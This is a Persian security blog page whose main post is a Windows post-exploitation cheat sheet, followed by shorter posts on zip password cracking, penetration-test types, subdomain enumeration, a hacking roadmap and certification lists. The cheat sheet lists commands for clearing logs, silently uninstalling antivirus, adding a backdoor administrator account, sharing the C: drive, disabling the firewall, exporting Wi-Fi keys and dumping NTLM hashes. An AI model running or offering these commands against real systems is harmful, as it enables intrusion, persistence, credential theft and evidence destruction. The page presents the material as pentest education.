Exploitation یا بهره برداری یک برنامه یا اسکریپت برنامه ریزی شده است که می تواند هکرها را قادر به کنترل یک سیستم و بهره برداری از آسیب پذیری های آن کند. Windows Post Exploitation تکنیکی برای پیاده سازی اهداف مخرب یک هکر بر روی سیستم عامل ویندوزی قربانی میباشد. هکر با استفاده از این تکنیک میتواند فرایندهای زیر را انجام دهد:

  • شناسایی تارگت ها (Understanding the victim)
  • ارتقا سطح دسترسی (Privilege escalation)
  • پاک کردن ردپا (Cleaning tracks and staying undetected)
  • جمع آوری اطلاعات سیستم (Collecting system information and data)
  • راه اندازی درب پشتی و روت کیت ها (Setting up backdooring and rootkits)
  • دسترسی به زیر شبکه کلاینت ها (Pivoting to penetrate internal)
  • و…

استفاده از این نوع تکنیک به دو صورت انجام میشود که اولی با استفاده از فریم ورک تست نفوذ متاسپلویت است که ماژولی مخصوص این کار دارد و قابل توسعه نیز میباشد. دومی نیز با استفاده از خط فرمان سیستم عامل انجام میگیرد. Post Exploitation در زمینه تست نفوذ (pentesting) و برنامه نویسی بدافزار (malware programing) به کار می رود.

در ادامه به بررسی برخی از دستورات مهم Windows Post Exploitation می پردازیم که در محیط cmd و پاورشل قابل اجرا میباشند. این دستورات به صورت زیر میباشند:

  • Blind Files (مشاهده فایل ها، مسیریابی پوشه ها یا پرونده های اشتراکی از طریق smb,ftp,nfs و..)
  • System (دستورات مرتبط با اطلاعات سیستم)
  • (Networking (ipconfig, netstat, net (دستورات مرتبط با شبکه)
  • Configs (دستورات مرتبط با پیکربندی سیستم عامل)
  • Finding Important Files (دستوراتی برای پیدا کردن اطلاعات حساس از سیستم)
  • Remote System Access ( دستوراتی برای دسترسی به سیستم از راه دور)
  • Deleting Logs (دستوراتی در رابطه با حذف فایل های لاگ)
  • (Uninstalling Software “AntiVirus” (Non interactive (دستوراتی در رابطه با حذف برنامه ها مانند انتی ویروس ها و…)
  • Invasive or Altering Commands (دستوراتی برای ایجاد تغییرات در سیستم عامل)
  • Third Party Portable Tools (ابزارهایی برای بهره برداری بیشتر)

مکان فایل های مهم Blind Files

دستوراتتوضیحات
tree C:\ /f /a > C:\output_of_tree.txtیک لیست دایرکتوری را در قالب “درخت” چاپ می کند. آرگومان a باعث می شود که درختان با استفاده از نویسه های ASCII به جای موارد خاص چاپ شوند و آرگومان f نام فایل ها و همچنین پوشه ها را نشان می دهد.
dir /aتمام پرونده ها را در یک دایرکتوری فهرست می کند که شامل فایل های پنهان و سیستمی نیز میشود.
dir /b /s [Directory or Filename]شامل فهرست پرونده ها و دایرکتوری ها میباشد.
dir \ /s /b | find /I “searchstring”
command | find /c /v “”شمارش تمام خطوطی که برای “فرمان” استفاده می کنید.

دستورات مرتبط با System

دستوراتتوضیحات
whoamiکاربر فعلی سیستم را نمایش میدهد.
whoami /allکاربر فعلی را به همراه گروه و سطح دسترسی نشان میدهد.
set

متغییر های محیطی را نشان میدهد. مانند:

USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE.

fsutil fsinfo drivesدرایو های فعلی سیستم را نشان میدهد. نیاز به دسترسی ادمین دارد.
reg query HKLM /s /d /f “C:\* *.exe” | find /I “C:\” | find /V “”””کوئری های ایمن ثبت شده در رجیستری سیستم عامل  ویندوز 7 را نشان میدهد.

دستورات مرتبط با (Networking (ipconfig, netstat, net

دستوراتتوضیحات
ipconfig /allاطلاعات کامل درباره NIC شما را نمایش می دهد.
ipconfig /displaydnsکش DNS محلی شما را نمایش می دهد.
netstat -naboلیست پورت ها / اتصالات با فرآیند متناظر (-b)، انجام ندادن (-n)، تمام اتصالات (-a) و مالکیت شناسه پردازش (-o)
netstat -rجدول مسیریابی را نمایش می دهد.
netstat -na | findstr :445همه پورت ها و اتصالات مربوط به  پورت 445 را پیدا کنید.
netstat -nao | findstr LISTENINGپیدا کردن تمام پورت های LISTENING و PID مربوط به آنها.
netstat -anob | findstr “services, process or port”پرچم “b” فرمان را طولانی تر می کند اما نام پروسه را با استفاده از هر یک از اتصالات نمایش می دهد.
netsh diag show all{XP only} اطلاعات مربوط به سرویس های شبکه و آداپتورها را نشان می دهد
net viewپرس و جو های (NBNS / SMB SAMBA) و تلاش برای پیدا کردن همه میزبان در گروه کاری یا دامنه فعلی شما.
net view /domainلیست تمام دامنه های موجود میزبان
net view /domain:otherdomainپرس و جوهای NBNS / SMB) SAMBA) و تلاش برای پیدا کردن همه میزبان در ‘otherdomain’
net user %USERNAME% /domainاطلاعاتی راجع به کاربر فعلی را نشان میدهد که جزو یک کاربر دامنه هستند. اگر شما یک کاربر محلی هستید پس شما فقط دامنه را رها می کنید. مهمترین چیزهایی که باید توجه داشته باشید عبارتند از زمان ورود، آخرین بار تغییر رمز عبور، اسکریپت های ورود به سیستم و عضویت در گروه.
net user /domainهمه کاربران دامنه را لیست می کند.
net accountsسیاست رمز عبور برای سیستم محلی را چاپ می کند.
net accounts /domainسیاست رمز عبور برای دامنه را چاپ می کند.
net localgroup administratorsاعضای گروه محلی Administrators را چاپ می کند.
net localgroup administrators /domainبرای استفاده از گروه و دامنه محلی فرض شده است.
net group “Domain Admins” /domainاعضای گروه مدیران دامنه را چاپ می کند.
net group “Enterprise Admins” /domainاعضای گروه مدیران اداری را چاپ می کند.
net group “Domain Controllers” /domainلیست کنترل کننده ها را برای دامنه فعلی چاپ می کند.
net sharesmb به اشتراک گذاشته شده شما را نمایش می دهد و مسیر (ها) آنها را نشان می دهد.
net session | find / “\\”
arp -aلیست تمام سیستم های موجود در جدول ARP دستگاه را نشان می دهد.
route printجدول مسیریابی ماشین را چاپ می کند. این می تواند برای پیدا کردن شبکه های دیگر و مسیرهای استاتیک که در آن قرار داده شده است مفید باشد.
browstat (Not working on XP)
netsh wlan show profilesتمام پروفایل های بی سیم ذخیره شده را نشان می دهد. بعدا می توانید اطلاعات مربوط به این پروفایل را با دستور زیر وارد کنید.
netsh wlan export profile folder=. key=clear

یک پروفایل کاربری wifi را با رمز عبور در متن ساده به یک فایل xml در دایرکتوری کاری فعلی صادر می کند.

netsh wlan [start|stop] hostednetworkیک هات اسپات را استارت یا استاپ میکند.
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporaryتنظیم کامل شبکه میزبان برای ایجاد یک Backdoor بی سیم.
netsh wlan set hostednetwork mode=[allow|disallow]

سرویس شبکه میزبان را فعال یا غیرفعال می کند.

wmic ntdomain listاطلاعات مربوط به دامنه و کنترل کننده دامنه را بازیابی کنید.

دستورات مرتبط با Configs

دستوراتتوضیحات
gpresult /zخروجی متشکل از GPO) Group policy) و تنظیمات مربوط به سیستم فعلی و کاربر را نشان میدهد.
sc qc <servicename>

تنظیمات سرویس را بررسی می کند.

sc query

به تنهایی مورد استفاده قرار می گیرد و تمام سرویس ها نمایش داده می شوند.

sc queryexاطلاعات گسترده در مورد همه یا یک سرویس را نشان میدهد.
type %WINDIR%\System32\drivers\etc\hostsاطلاعات گسترده در مورد همه یا یک سرویس را نشان میدهد.
echo %COMSPEC%

معمولا در cmd.exe در دایرکتوری ویندوز قرار می گیرند، اما خوب است که مطمئن شوید.

c:\windows\system32\gathernetworkinfo.vbsثبت نام رجیستری، پیکربندی فایروال، کش DNS، اسکریپت و غیره را داخل ویندوز۷ نشان میدهد.

دستوراتی برای Remote System Access

دستوراتتوضیحات
net share \\computername
tasklist /V /S computername
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computernameبه شما اجازه می دهد تا به سیستم دوردست به عنوان کاربر فعلی دسترسی پیدا کنید
net use \\computername /user:DOMAIN\username password

با استفاده از IPC $ mount، یک نام کاربری و رمز عبور به شما اجازه می دهد تا به دستورات دسترسی پیدا کنید که معمولا از نام کاربری و رمز عبور به عنوان کاربر دیگری در زمینه سیستم از راه دور درخواست نمی کنند.

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /fفعال کردن سرویس دسترسی از راه دور.
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f

 

کمک از راه دور را فعال کنید.

دستوراتی در رابطه با Deleting Logs

  • wevtutil el (list logs)
  • wevtutil cl <LogName> (Clear specific lowbadming)
  • del %WINDIR%\*.log /a /s /q /f

دستوراتی در رابطه با Uninstalling Software

  • wmic product get name /value (this gets software names)
  • wmic product where name=”XXX” call uninstall /nointeractive (this uninstalls software)

دستوراتی برای ایجاد تغییرات در سیستم Invasive or Altering Commands

دستورات

توضیحات
net user hacker hacker /addیک کاربر جدید محلی با نام هکر و پسورد “هکر” ایجاد میکند.
net localgroup administrators /add hacker

or

net localgroup administrators hacker /add

کاربر “هکر” جدید را به گروه مدیران محلی اضافه می کند.
net share nothing$=C:\ /grant:hacker,FULL /unlimited

درایو C (یا هر درایو دیگر) به عنوان سهم ویندوز به اشتراک میگذارد. و حقوق کامل کاربر هکر را برای دسترسی یا تغییر هر چیزی در آن درایو به شما ارائه می دهد.

net user username /active:yes /domainیک حساب کاربری غیر فعال / غیر فعال را فعال می کند.
netsh firewall set opmode disableفایروال ویندوز را غیرفعال می کند.
netsh firewall set opmode enableفایروال ویندوز را فعال می کند.

ابزارهایی برای بهره برداری بیشتر Third Party Portable Tools

دستوراتبرنامه های مرتبطتوضیحات
carrot.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp /dialup /pwdumphttp://h.ackack.net/carrot-exe.htmlبازگرداندن تنظیمات متداول فایروال setupnetsh opmode را غیر فعال می کند.
PwDump7.exe > ntlm.txthttp://www.tarasco.org/security/pwdump_7/هش های ویندوز NTLM را پاک می کند.

تست نفوذآموزش شکستن پسورد فایل Zip,Rar

برای شکستن پسورد فایل های زیپ ابزارهای زیادی وجود دارد. یکی از کاربردی ترین آنها ابزار fcrackzip می باشد که به صورت پیشفرض در سیستم عامل کالی لینوکس نیز نصب میباشد. fcrackzip کاملا رایگان است و شما میتوانید به صورت نامحدود از آن برای حملات بروت فورس بر روی فایل های زیپ خود استفاده کنید.

برای استفاده از این ابزار در کالی لینوکس به صورت زیر عمل می کنید:

همانطور که در تصویر بالا مشاهده میکنید این ابزار از چندین نوع حمله پشتیبانی میکند.

اگر شما از آرگومان -benchmark استفاده کنید، fcrackzip به شما خواهد گفت که چند کلمه عبور در هر ثانیه بر روی دستگاه شما می تواند آزمایش شود، بنابراین شما می توانید سریعترین گزینه را انتخاب کنید.

در سیستم من، zip6 سریعترین نوع برای استفاده است. بنابراین میتوانم یک حمله قوی با لیست دیکشنری که شامل ۴-۸ کاراکتر میشود را انجام دهم. به دستور زیر دقت کنید:

آرگومان های استفاده شده در دستور بالا:

  • آرگومان v خروجی بهتری را برای ما نشان میدهد.
  • آرگومان m حالت استفاده را مشخص می کند، در این مورد zip6
  • آرگومان l حداقل و حداکثر طول پسورد را مشخص می کند.
  • آرگومان u به برنامه میگوید قبل اعلان پسورد، ابتدا آنرا تست کند.

این کار از طریق منابع سیستم شما انجام می شود و زمان زیادی را صرف خواهد کرد بسته به اینکه طول رمز شما چه اندازه باشد.

همچنین شما میتوایند از لیست دیکشنری خودتون برای انجام کرک استفاده کنید. دستور زیر را مشاهده کنید:

در دستور بالا آرگومان p برای وارد کردن لیست دیکشنری به ابزار استفاده شده است.

همه چیز درباره تست نفوذ و انواع آن

ارزیابی های امنیتی و تست نفوذ ممکن است به دلایل مختلفی انجام گیرد و رویکردهای مختلفی را به دست آورد. هر ارزیابی یا تست نفوذ بر اساس نیاز خاص مشتری ارایه می شود. در این پست تفاوت بین ارزیابی های داخلی و خارجی را مشخص می کنیم. همچنین تفاوت آزمون های جعبه سفید، جعبه سیاه و جعبه خاکستری را بررسی خواهیم کرد.

ارزیابی های داخلی و خارجی(Internal vs. External)

به طور کلی ارزیابی های داخلی و خارجی به ارزیابی شبکه و نرم افزار مربوط می شود. ارزیابی امنیتی به طور مستقیم در شبکه هدف (یعنی اتصال LAN یا WiFi) را ارزیابی داخلی و ارزیابی یا دسترسی آن از خارج (یعنی وب سایت ها یا اتصالات داده) را ارزیابی خارجی گویند.

  • ارزیابی های داخلی(Internal): تست حملات نفوذ پذیری از داخل سازمان مانند یک کارمند سرکش یا یک هکر که به سازمان نفوذ کرده است.
  • ارزیابی های خارجی(External): تست حملات نفوذ پذیری از خارج سازمان را بررسی می کند.

همچنین ارزیابی های امنیتی میتواند در حوزه های مختلفی انجام شود. به عنوان مثال در شبکه های داخلی به منظور یافتن موارد:

  • ساختار، معماری و سیاست های مدیریتی شبکه ی داخلی
  • تجهیزات شبکه مانند سوئیچ ها، مسیریاب ها ،اکسس پوینت ها و غیره
  • تجهیزات امنیتی از قبیل دیواره آتش
  • امنیت سرویس دهنده ها و بستر مجازی شبکه
  • امنیت سرویس دهنده ها از منظر آسیب پذیری در برابر حملات شناخته شده
  • و…

انواع تست نفوذ جعبه سفید(White Box), جعبه سیاه(Black Box) و جعبه خاکستری(Gray Box)

 

این گزینه های تست نفوذ، سطح دانش نفوذگر، هدف و نیت نفوذگر را در طی آزمون نفوذپذیری ارائه میکند.

جعبه سفید(White Box): به طور معمول به عنوان یک آزمون تایید شده شناخته می شود، این آزمون با آگاهی کامل از ساختار داخلی شما انجام می شود. اطلاعات به اشتراک گذاشته معمولا شامل آدرس های IP و نام میزبان، پیکربندی های سیستم، نمودارهای شبکه و اعتبار های خاص است. که برای تست ساختار داخلی اجزای سیستم مورد استفاده قرار می گیرد.

جعبه سیاه(Black Box): به طور معمول به عنوان یک آزمون غیرقابل شناسایی نامیده می شود، این آزمون بدون دانستن ساختار داخلی شما انجام می شود. اطلاعات شناخته شده معمولا به نام شرکت و دامنه محدود می شود. این تکنیک به بطور کامل نشان می دهد که چگونه یک مهاجم به سازمان نزدیک می شود. تست جعبه سیاه یک رویکرد کندتر برای تست است زیرا تعداد خطاها بیشتر و دانش موجود در مورد سازمان کم است.

جعبه خاکستری(Gray Box): این آزمون بین آزمایش سفید و جعبه سیاه است که در آن تست نفوذ کننده برخی از دانش در مورد سیستم داخلی را میداند. مقدار دانش داده شده معمولا شامل لیستی از آدرس های IP یا نام های میزبان برای هدف و برنامه ها و یا نسخه های نرم افزاری و سخت افزاری میباشد که به تست نفوذ کننده اجازه می دهد تا سیستم های بحرانی سازمان را اولویت بندی کند و بشناسد.

جعبه خاکستری(Gray Box)

۵ فاز اصلی تست نفوذ

دوره هک اخلاقی (Ethical Hacking) که یکی از پایه ای ترین دوره های تست نفوذ است، اساسا از پنج مرحله اصلی تشکلیل شده است. هک اخلاقی در بعضی جاها با عنوان تست نفوذ نیز شناخته میشود. منظور از تست نفوذ، نفوذ به سیستم یا شبکه ها برای پیدا کردن تهدیدها و آسیب پذیری ها در آنها است. هدف از هک اخلاقی بهبود امنیت شبکه یا سیستم ها از طریق رفع آسیب پذیری های موجود در حین آزمایش است. هکرهای اخلاقی همان روش ها و ابزارهایی را که توسط هکرهای مخرب مورد استفاده قرار می گیرند را به همراه مجوز و به منظور بهبود امنیت و دفاع از سیستمها و شبکه ها استفاده می کنند.

این ۵ فاز عبارتند از:

  1. شناسایی (Reconnaissance)
  2. اسکن و انالیز (Scanning)
  3. گرفتن دسترسی (Gaining Access)
  4. حفظ دسترسی (Maintaining Access)
  5. پاک کردن ردپا (Covering Tracks)

شناسایی (Reconnaissance): اولین فاز در هکینگ است که در آن، هکر اطلاعاتی مفیدی از قبیل محدوده IP آدرس، شبکه، پرونده های DNS و غیره را از تارگت خود جمع آوری می کند. شناسایی دو نوع است:

  • شناسایی فعال: در این فرآیند شما به طور مستقیم با سیستم کامپیوتری ارتباط برقرار می کنید تا اطلاعات کسب کنید. این اطلاعات می تواند بسیار دقیق باشد.
  • شناسایی غیر فعال: در این فرآیند شما مستقیما به سیستم کامپیوتری متصل نخواهید شد. این فرایند برای جمع آوری اطلاعات ضروری میباشد.

اسکن و آنالیز (Scanning): پس از جمع آوری اطلاعات در مرحله شناسایی، مرحله بعدی، اسکن میباشد که هدف آن پیدا کردن آسیب پذیریها است. در این مرحله ابزارهای مختلفی برای جمع آوری اطلاعات به کار میروند که شامل اسکن پورت های باز، سرویس های فعال، نشانگرهای شبکه، نقاط ضعف و … میباشد. معرفی بهترین اسکنرهای آسیب پذیری

گرفتن دسترسی (Gaining Access): پس از دو مرحله فوق، هکر اطلاعات کافی در مورد اهداف خود جمع آوری کرده و ممکن است از باگ های پیدا شده برای بهره برداری از سیستم شما استفاده کند. نفوذ اصلی در این مرحله اتفاق می افتد و  تارگت مورد بهره برداری قرار می گیرد و دسترسی به سیستم آن به دست می آید.

حفظ دسترسی (Maintaining Access): پس از  گرفتن دسترسی از سیستم هدف، گاهی اوقات هکر از این سیستم به عنوان پایگاهی برای حملات بیشتر استفاده می کند و از این طریق، کل شبکه را می تواند به خطر بیاندازد، بنابراین لازم است که دسترسی به دست آمده را حفظ کند. همچنین هک شده با نام سیستم زامبی شناخته میشود.

پاک کردن ردپا (Covering Tracks): پس از نفوذ به هر سیستم، امکان دارد رد پای دیجیتال هکر در آن سیستم بر جای بماند که هویت او را نشان می دهد. هکر باید مهارت های لازم برای حذف ردپای خود و نشانه های جرم را داشته باشد تا بعدها از طریق تکنیک های جرم یابی(Forensic) شناخته نشود. پس باید بعد از دسترسی گرفتن از سیستم هدف، هکر بتواند تمام ردپای خود را از روی سیستم هدف مانند لاگ های سیستم، فایل های temp، رجیستری… پاک کند.

پیدا کردن ساب دامین های یک وب سایت

subdomain چیست؟

یک زیر دامنه یا ساب دامین بخش دیگری برای دامنه اصلی شماست. زیر دامنه ها برای سازماندهی و انتقال به بخش های مختلف یک وب سایت ایجاد می شوند. شما می توانید چندین زیر دامنه مختلف را در حوزه اصلی وب سایت خود ایجاد کنید.

برای مثال دامنه shop.target.com را در نظر بگیرید. در این مثال، ‘shop’ زیر دامنه است، ‘target’ دامنه اصلی است و ‘.com’ دامنه سطح بالا (TLD) است. شما می توانید از هر متن به عنوان زیر دامنه خود استفاده کنید، اما به یاد داشته باشید که باید مرتبط و کوتاه باشد تا به خاطر سپردن آن دشوار نباشد.

پیدا کردن ساب دامین های یک سایت

دلایل مختلفی وجود دارد که از زیر دامنه ها استفاده می کنند. در ادامه به بعضی از موارد استفاده از Subdomain اشاره خواهیم کرد.

دلایل استفاده از subdomain

رایج ترین دلیل استفاده از یک زیر دامنه برای آزمایش یا راه اندازی یک وب سایت است. شما می توانید یک وبسایت کاملا جدا را بر روی ساب دامین خود ایجاد کنید. اغلب توسعه دهندگان پلاگین ها و طراحان قالب ها، طرح های خود را بر روی ساب دامین ها آزمایش میکنند تا آنرا با وب سایت اصلی مقایسه کنند.

همچنین می توانید دامنه های زیر را در سایت خود برای کاربران خاص  مانند “guest.yourwebsite.com”، “user.yourwebsite.com” و … ایجاد کنید. این زیر دامنه ها از فضای میزبانی شما استفاده خواهند کرد. میتوان نتیجه گرفت که وبسایت هایی مانند WordPress.com، blogger.com و … وبسایت های سفارشی را به دیگر کاربران ارائه می دهند.

یکی دیگر از دلایل استفاده از زیر دامنه ها، ایجاد فروشگاه های آنلاین میباشد. اغلب شرکت ها می خواهند زیر دامنه جداگانه ای را برای رسیدگی به معاملات و خرید و فروش های خود داشته باشند.

Subdomainها می توانند در سازماندهی محتوای وب سایت شما بسیار مفید باشند. اما تاثیری در SEO وب سایت شما ندارند. با این حال شما میتوانید محتوای اصلی خود را بر روی دامنه اصلی خود نگهداری کنید.

اهمیت Subdomain برای هکرها

نفوذگر ها بعد از تست نفوذ دامنه اصلی، و ناموفق بودن جستجوی آنها برای کشف آسیب پذیری ها، قطعا به سراغ زیر دامنه ها خواهند آمد تا بتوانند از طریق زیر دامنه ها نفوذ خود را به وب سایت تارگت انجام دهند. پس میتوان نتیجه گرفت که با افزایش تعداد زیر دامنه ها، امنیت وب سایت تا حدودی کاهش می یابد. البته میتوان با به روز رسانی های متداول و رعایت نکات امنیتی این مشکل را به صفر رساند. همانطور که اکثر سازمان ها و شرکت ها با داشتن زیر دامنه های زیاد، میتوانند امنیت کافی سایت اصلی را تامین کنند.

آموزش پیدا کردن ساب دامین های یک وبسایت

برای پیدا کردن ساب دامین های یک وب سایت روش های مختلفی وجود دارد که یکی از آنها استفاده از دورک ها میباشد. شما میتوانید از طریق سرچ دامنه خود در موتورهای جستجو، به اکثر زیر دامنه های یک وب سایت دست یابید.

پیدا کردن ساب دامین های یک وبسایت با دورک ها

ابزار های زیادی هم در این زمینه وجود دارد که یکی از پرکاربردترین آنها ابزار SubDomainizer میباشد. این ابزار میتواند به راحتی ساب دامین های یک وب سایت را برای شما پیدا کند. در ادامه به نحوه نصب و کارکرد این ابزار قوی خواهیم پرداخت.

آموزش نصب ابزار SubDomainizer

برای نصب ابزار SubDomainizer از گیت هاب استفاده میکنیم:

سپس با دستور زیر به دایرکتوری مربوطه میرویم:

برای نصب پیش نیازهای ابزار، از دستور زیر استفاده میکنیم:

سپس با دستور زیر میتوانیم از ابزار بهره برداری کنیم:

به عنوان مثال در تصویر زیر، وب سایت فیس بوک را با این ابزار تست میکنیم:

امیدوارم این آموزش هم براتون مفید واقع شده باشه.

منبع:https://kaliboys.com


روش های امن سازی WiFi

امروزه امنیت شبکه‌های بی‌سیم خانگی یکی از موضوعات مورد توجه کاربران خانگی می‌باشد. شاید برای شما هم اتفاق افتاده باشد که حجم اینترنت خانگی‌تان گاها خیلی زود به پایان رسیده باشد در حالی که شما به آن اندازه از حجم‌تان مصرف نکرده‌اید. ( امن سازی WiFi ) 

ادامه مطلب ...

نقشه راه ۰ تا ۱۰۰ ورود به دنیای تست و نفوذ و امنیت سایبری

مرحله اول آشنایی با مفاهیم اولیه.

مرحله دوم آشنایی با خط فرمان های سیستم عامل ها.

مرحله سوم آشنایی با فریمورک های نفوذ و پنتست.

مرحله چهارم آشنایی با آسیب پذیری های تحت وب.

مرحله پنجم طریقه جمع آوری اطلاعات از سطح اینترنت.

مرحله ششم کرک اکانت و جمع آوری اکانت.

مرحله هفتم آشنایی با رمزنگاری ها و تست ضعف رمزنگاری.

مرحله هشتم تکنیک های نفوذ به شبکه های زیرساختی و بیسیم.

مرحله نهم تکنیک های نفوذ و دور زدن مکانیزم های برنامه های کاربردی.

مرحله دهم تست نفوذ با زبان پایتون.

مرحله یازدهم آشنایی یا زبان پاورشل و پتانسیل آن.

مرحله دوازدهم تکنیک های مبهم سازی ر برنامه نویسی و رمزنگاری.

مرحله سیزدهم تکنیک های ارتقاء سطح دسترسی.

مرحله چهاردهم تکنیک های نگهداری دسترسی و بکدور.

مرحله پانزدهم تکنیک های ضد ردیابی دسترسی.

مرحله شانزدهم برنامه نویسی زبان C و سوکت نویسی.

مرحله هفدهم برنامه نویسی زبان روبی و جاوا اسکریپت.

مرحله هجدهم برنامه نویسی .VBScript & ActionScript

مرحله نوزدهم برنامه نویسی زبان ماشین.

مرحله بیستم آشنایی با ساختار فایل فرمت ها و ماژول های کرنل.

مرحله بیست و یکم برنامه نویسی .COM & DCOM

مرحله بیست و دوم تحلیل ساختار فایروال های نرم افزاری و سخت افزاری.

مرحله بیست و سوم مهندسی معکوس هر برنامه ای و تکنیکی.

مرحله بیست و چهارم اکسپلویت نویسی و دور زدن مکانیزم های دفاعی.

مرحله بیست و پنجم ساختن بکدورهای روت کیت و بوت کیت.

مرحله بیست و ششم اکسپلویت نویسی سیستم عامل های گوشی ها.

مرحله بیست و هفتم تکنیک های حملات به ماهواره ها و شنود آنها.

-> آموزش های لازم برای تمامی مراحل بالا تو سطح نت موجود هست. ما هم سعی میکنیم که هر روز به اموزش برخی از این مراحل بپردازیم.
-> منبع این نقشه راه تیم  Unk9vvN بوده و به دلیل کامل بودن مطلب، این پست از این تیم کپی برداری شده.

منبع:https://kaliboys.com

آموزش امنیت گواهینامه ها و آزمون های مباحث کامپیوتر

گواهینامه های لینوکس

آزمون بین المللی REDHAT

  • (Red Hat Certified System Administrator (RHCSA
  • (Red Hat Certified Engineer (RHCE
  • (Red Hat Certified Virtualization Administrator (RHCVA
  • (Red Hat Certified Datacenter Specialist (RHCDS
  • (Red Hat Certified Security Specialist (RHCSS
  • (Red Hat Certified Architect (RHCA

آزمون بین المللی LPIC

  • Linux Essentials
  • (Junior Level Linux Certification (LPIC-1
  • (Advanced Level Linux Certification (LPIC-2
  • (Senior Level Linux Certification (LPIC-3

آزمون بین المللی Novell

  • Novell Certified Linux Engineer
  • Certified Linux Administrator
  • Certified Linux Desktop Administrator
  • Novell Certified Linux Professional

آزمون بین المللی ORACLE

  • (Oracle Solaris System Administrator (OCA
  • (Oracle Solaris System Administrator (OCP
  • (Oracle Solaris Network Administrator (OCE
  • (Oracle Solaris Security Administrator (OCE
  • (Oracle Solaris Cluster System Administrator (OCP
  • (Oracle Linux Administrator (OCA
  • Oracle Linux Certified Implementation Specialist
  • Managing Oracle on Linux Certified Expert

آزمون بین المللی IBM

  • IBM Certified Systems Expert – Enterprise Technical Support for AIX and Linux
  • IBM CSE – Virtualization Technical Support for AIX and Linux
  • IBM CSE – High Availability for AIX Technical Support and Administration
  • IBM Certified Operator – AIX Basic Operations
  • IBM Certified System Administrator – AIX

آزمون بین المللی HP

  • CSA – HP-UX
  • CSE – Specialty in High Availability – HP-UX
  • CSE – Specialty in Networking and Security – HP-UX
  • CSE – Specialty in Virtualization – HP-UX

آزمون بین المللی BSD

  • (BSD Associate (BSDA
  • (BSD Professional (BSDP

آزمون بین المللی GIAC

  • (GIAC Certified UNIX Security Administrator (GCUX

گواهینامه ها و آزمون های شبکه

  • (Juniper Networks Certified Internet Associate or Specialist (JNCIA/JNCIS
  • (Network+ (CompTIA
  • +CompTIA’s Security
  • (WCNA (Wireshark
  • (Cisco Certified Network Professional (CCNP
  • (Cisco Certified Internetwork Expert (CCIE
  • (Cisco Certified Entry Networking Technician (CCENT
  • (Cisco Certified Network Associate Routing and Switching (CCNA R&S
  • (Cisco Certified Design Associate (CCDA
  • (Cisco Certified Network Associate Cloud (CCNA Cloud
  • (Cisco Certified Network Associate Data Center (CCNA Data Center
  • (VMware Certified Professional 6 – Network Virtualization (VCP6-NV
  • AWS Certified Solutions Architect

گواهینامه ها و دوره های هک و امنیت

  • دوره CISSP
  • دوره SysAdmin, Networking and Security از شرکت SANS
  • دوره هکر اخلاقی Certified Ethical Hacker – CEH از شرکت EC-Council
  • دوره هک و امنیت Offensive Security Certified Professional – OSCP
  • دوره امنیت Security CompTIA
  • دوره امنیت CopmTIA Security+
  • دوره امنیت CopmTIA Security+
  • دوره CREST
  • دوره Vendor-specific certifications
  • دوره Red Hat And Other Linux Security Certs

گواهینامه ها و دوره های مایکروسافت

  • Microsoft Technology Associate (MTA) – Entry level
    IT Infrastructure
  • Microsoft Certified Solutions Associate (MCSA) – Associate level
    MCSA: Windows Server 2012
    MCSA: Windows Server 2008
  • Microsoft Certified Solutions Expert (MCSE) – Expert level
    MCSE: Server Infrastructure

امیدوارم که نهایت استفاده رو کرده باشید و دیگر نام دوره ها برای شما مجهول نباشد.


منبع:https://kaliboys.com

تست نفوذآموزشامنیت ابزارهای کاربردی در زمینه تست نفوذ

برای تست نفوذ ابزارهای زیادی وجود داره که شاید انتخاب انها برای شما سخت باشد.با مطالعه این پست میتونید بر اساس نیاز خودتون ابزار کار خود را پیدا کنید.  ادامه مطلب ...

آزمون تست نفوذ چیست؟

تست نفوذ پذیری رویه ای است که برای ارزیابی امنیت نرم افزاری یک سازمان استفاده می شود. کارشناسان تست نفوذ که عمدتا دانش برنامه نویسی بالایی دارند، با استفاده از تکنیک های نفوذ، یک حمله واقعی را روی بستر تارگت شبیه سازی می کنند تا به این وسیله سطح امنیت یک سیستم را مشخص کنند.

تست نفوذ به سازمان کمک می کند که ضعف های شبکه  ساختارهای اطلاعاتی خود را بهتر بشناسد و درصدد اصلاح آنها برآید.  ادامه مطلب ...

14 منبع آموزشی رایگان و کاربردی برای یادگیری زبان پیتون

پیتون به عنوان یک زبان چند منظوره امکانات متعددی را در زمینه توسعه برنامه‌های کاربردی تحت وب و دسکتاپ در اختیار برنامه‌نویسان قرار می‌دهد. ترکیب نحوی ساده، مختصر بودن دستورات و انعطاف‌پذیری پیتون در زمان کار با بزرگ داده‌ها باعث شده است تا پیتون به انتخاب اول برنامه‌نویسان تبدیل شود.

یکی از دلایل محبوبیت پیتون در ارتباط با کاربردهای آن در حوزه تحقیقات و آموزش است. در زمینه یادگیری پیتون دانشجویان و افراد تازه‌کار به طیف بسیار گسترده‌ای از منابع دسترسی دارند. 

ادامه مطلب ...

9 نکته که باید درباره شبکه‌های مش بدانید!

شاید در ماه‌هاى گذشته درباره شبکه‌های مش چیزهایی شنیده باشید. شبکه‌های مش یک تکنیک موقتی یا راه‌حلی کوتاه‌مدت نیستند و مزایای عمده‌ای دارند که می‌توانند ما را به رویای دنیای تمام متصل نزدیک‌تر کنند. شبکه‌های مش فراتر از چند برند و محصول هستند و به روترهای مش وای‌فای محدود نمی‌شوند. گاهی اوقات مردم باید یک تجسم عملی و کاربرد واقعی یک فناوری را مشاهده کنند تا مفاهیم پشت سر یک عبارت یا کلمه را متوجه شوند و به درکی حقیقی از آینده برسند. در ادامه سعی بر این است که تصویر بزرگ‌تری از شبکه‌های مش را برای شما ترسیم کرده و به برخی پرسش‌ها یا عبارت‌های نامفهوم این فناوری پاسخ دهیم. می‌خواهیم نشان بدهیم شبکه‌های مش چه تاثیری روی اینترنت اشیا و دنیای همیشه متصل خواهند گذاشت و چرا باید این فناوری را جدی بگیریم. 
ادامه مطلب ...

23 قابلیت و ترفند آشکار و پنهان در دل اینستاگرام (بخش اول)

